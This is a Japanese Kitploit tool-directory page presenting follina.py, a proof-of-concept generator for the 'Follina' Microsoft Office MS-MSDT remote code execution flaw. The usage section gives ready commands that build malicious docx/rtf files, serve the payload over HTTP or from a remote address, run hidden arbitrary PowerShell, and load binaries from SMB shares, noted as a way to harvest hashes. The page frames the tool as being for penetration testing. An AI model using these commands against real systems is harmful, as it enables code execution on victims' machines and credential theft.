Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
follina.py — テスト目的で「Follina」Office RCE 脆弱性を完全に再現する POC | Kitploit
ツール/GitHubGitHub/chvancooten/follina.py
ペイロード生成エクスプロイトペネトレーションテストレッドチーミング
GitHubchvancooten/follina.py

follina.py

テスト目的で「Follina」Office RCE 脆弱性を完全に再現する POC

リポジトリを見る
1.1k2483年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

'Follina' MS-MSDT n-day Microsoft Office RCE

'Follina' Office RCE 脆弱性をローカルテスト目的で再現するためのクイックPOCです。スクリプトを実行すると、カレントワーキングディレクトリに clickme.docx(または clickme.rtf)ペイロードファイルが生成され、ペイロードファイル(www/exploit.html)を配信するWebサーバーが起動します。ペイロードとWebサーバーのパラメータは設定可能です(ヘルプと例を参照)。

⚠ 本番環境では使用しないでください。さもないと、あなたはバカとみなされます。

使用方法:

root@kitploit:~
$ python .\follina.py -h
usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] -t {rtf,docx} [-u URL] [-H HOST] [-P PORT]

options:
  -h, --help            show this help message and exit

Required Arguments:
  -m {command,binary}, --mode {command,binary}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -t {rtf,docx}, --type {rtf,docx}
                        The type of payload to use, can be "docx" or "rtf"
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost". Disables web server if custom URL scheme or path are specified
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80

使用例:

root@kitploit:~
# Execute a local binary
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe

# On linux you may have to escape backslashes
python .\follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -t docx -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -t rtf -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -t rtf -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

謝辞

この問題の最初の分析をしてくれたKevin Beaumont氏、POCを共有してくれた@KevTheHermit氏、ペイロード要件の分析をさらに進めてくれたJohn Hammond氏に感謝します。また、Office 2019に対応したテンプレートを提供してくれた@mkolsek氏、そして私にペイロードのバージョンを共有してくれた@theluemmel氏にも感謝します。

ツールをダウンロード